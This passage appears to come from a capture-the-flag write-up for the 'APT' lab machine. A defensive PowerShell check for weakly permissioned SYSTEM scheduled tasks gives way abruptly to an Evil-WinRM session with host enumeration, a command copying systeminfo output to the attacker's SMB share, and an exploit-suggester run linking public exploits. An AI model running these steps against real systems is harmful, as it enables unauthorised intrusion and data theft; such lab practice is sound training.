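        # Resolve what actually runs: a "-file <script>" argument is the real target.
        $target = $action.Execute.Trim('"')
        if ($action.Arguments -match '(?i)-file\s+"?([^"]+)"?') { $target = $Matches[1] }
        $dir = Split-Path -Path $target -Parent
        [pscustomobject]@{
            Task        = $task.TaskPath + $task.TaskName
            RunsAs      = $task.Principal.UserId
            Target      = $target
            FileWriters = (Get-WeakWriters $target) -join ', '
            DirWriters  = (Get-WeakWriters $dir) -join ', '
        }
    }
} | Format-Table -AutoSize -Wrap
```

A row whose RunsAs is SYSTEM and whose FileWriters or DirWriters column is not empty is a privilege-escalation path and should be fixed by tightening the ACL (or moving the scripts under a directory only administrators can write to); a "<missing: ...>" entry means the task points at a file that no longer exists, which is equally worth cleaning up.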
systeminfo
*Evil-WinRM* PS C:\> systeminfo

Host Name:                 APT
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Administrator
Registered Organization:   Managed by Terraform
Product ID:                00376-30821-30176-AA213
Original Install Date:     9/24/2020, 7:54:17 AM
System Boot Time:          10/23/2023, 12:11:47 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
                           [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,867 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 3,485 MB
Virtual Memory: In Use:    1,314 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    htb.local
Logon Server:              \\APT
Hotfix(s):                 4 Hotfix(s) Installed.
                           [01]: KB3199986
                           [02]: KB4565912
                           [03]: KB4576750
                           [04]: KB5000803
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.213
                                 [02]: fe80::44d8:93c7:dd88:c522
                                 [03]: dead:beef::b885:d62a:d679:573f
                                 [04]: dead:beef::44d8:93c7:dd88:c522
                                 [05]: dead:beef::240
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Only 4 hotfixes are installed (KB3199986, KB4565912, KB4576750, KB5000803), which is what the next step feeds to the exploit suggester.
Vulnerabilities
*Evil-WinRM* PS C:\> systeminfo > sysinfo.txt
*Evil-WinRM* PS C:\> copy .\sysinfo.txt \\10.10.16.8\smb\
┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ wes --update ; wes sysinfo.txt -c -p KB3199986 KB4565912 KB4576750 KB5000803 --exploits-only --hide "Internet Explorer" Edge Flash -s critical
Windows Exploit Suggester 1.02 ( https://github.com/bitsadmin/wesng/ )
[+] Updating definitions
[+] Obtained definitions created at 20231021
Windows Exploit Suggester 1.02 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
- Name: Windows Server 2016
- Generation: 2016
- Build: 14393
- Version: 1607
- Architecture: x64-based
- Installed hotfixes (4): KB3199986, KB4565912, KB4576750, KB5000803
- Manually specified hotfixes (4): KB4576750, KB5000803, KB4565912, KB3199986
[+] Loading definitions
- Creation date of definitions: 20231021
[+] Determining missing patches
[+] Filtering duplicate vulnerabilities
[+] Applying display filters
[!] Found vulnerabilities!
Date: 20161108
CVE: CVE-2016-7241
KB: KB3200970
Title: Cumulative Security Update for Microsoft Edge
Affected product: Windows Server 2016
Affected component: Microsoft Edge
Severity: Critical
Impact: Remote Code Execution
Exploits: https://www.exploit-db.com/exploits/40875/, http://packetstormsecurity.com/files/139991/Microsoft-Edge-JSON.parse-Information-Leak.html
Date: 20161108
CVE: CVE-2016-7200
KB: KB3200970
Title: Cumulative Security Update for Microsoft Edge
Affected product: Windows Server 2016
Affected component: Microsoft Edge
Severity: Critical
Impact: Remote Code Execution
Exploits: https://www.exploit-db.com/exploits/40990/, https://www.exploit-db.com/exploits/40785/
Date: 20161108
CVE: CVE-2016-7240
KB: KB3200970
Title: Cumulative Security Update for Microsoft Edge
Affected product: Windows Server 2016
Affected component: Microsoft Edge
Severity: Critical
Impact: Remote Code Execution
Exploit: https://www.exploit-db.com/exploits/40773/
Date: 20161108
CVE: CVE-2016-7201
KB: KB3200970
Title: Cumulative Security Update for Microsoft Edge
Affected product: Windows Server 2016
Affected component: Microsoft Edge
Severity: Critical
Impact: Remote Code Execution
Exploits: https://www.exploit-db.com/exploits/40990/, https://www.exploit-db.com/exploits/40784/
Date: 20170314
CVE: CVE-2017-0143
KB: KB4016635
Title: Windows SMB Remote Code Execution Vulnerability
Affected product: Windows Server 2016
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploits: https://www.exploit-db.com/exploits/41891/, https://www.exploit-db.com/exploits/41987/, https://www.exploit-db.com/exploits/43970/
Date: 20170613
CVE: CVE-2017-0143
KB: KB4022723
Title: Windows SMB Remote Code Execution Vulnerability
Affected product: Windows Server 2016
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploits: https://www.exploit-db.com/exploits/41891/, https://www.exploit-db.com/exploits/41987/, https://www.exploit-db.com/exploits/43970/
Date: 20161108
CVE: CVE-2016-7202
KB: KB3200970
Title: Cumulative Security Update for Microsoft Edge
Affected product: Windows Server 2016
Affected component: Microsoft Edge
Severity: Critical
Impact: Remote Code Execution
Exploits: https://www.exploit-db.com/exploits/40793/, https://www.exploit-db.com/exploits/40786/
Date: 20200512
CVE: CVE-2020-0646
KB: KB4532933
Title: .NET Framework Remote Code Execution Injection Vulnerability
Affected product: Microsoft .NET Framework 4.8 on Windows Server 2016
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploit: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
Date: 20161108
CVE: CVE-2016-7203
KB: KB3200970
Title: Cumulative Security Update for Microsoft Edge
Affected product: Windows Server 2016
Affected component: Microsoft Edge
Severity: Critical
Impact: Remote Code Execution
Exploit: https://www.exploit-db.com/exploits/40787/
[-] Missing patches: 4
- KB3200970: patches 6 vulnerabilities
- KB4016635: patches 1 vulnerability
- KB4022723: patches 1 vulnerability
- KB4532933: patches 1 vulnerability
[I] KB with the most recent release date
- ID: KB4532933
- Release date: 20200512
[+] Done. Displaying 9 of the 570 vulnerabilities found.
Web
*Evil-WinRM* PS C:\inetpub\wwwroot> ls

    Directory: C:\inetpub\wwwroot

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/24/2020   8:31 AM                css
d-----        9/24/2020   8:31 AM                fonts
d-----        9/24/2020   8:31 AM                images
d-----        9/24/2020   8:31 AM                js
-a----       12/23/2019  11:30 AM           9386 about.html
-a----       12/23/2019  11:30 AM          12146 clients.html
-a----       12/23/2019  11:29 AM          14879 index.html
-a----        9/24/2020   9:28 AM           5528 news.html
-a----       12/23/2019  11:30 AM          10592 services.html
-a----       12/23/2019  11:30 AM           6326 support.html

Just static pages.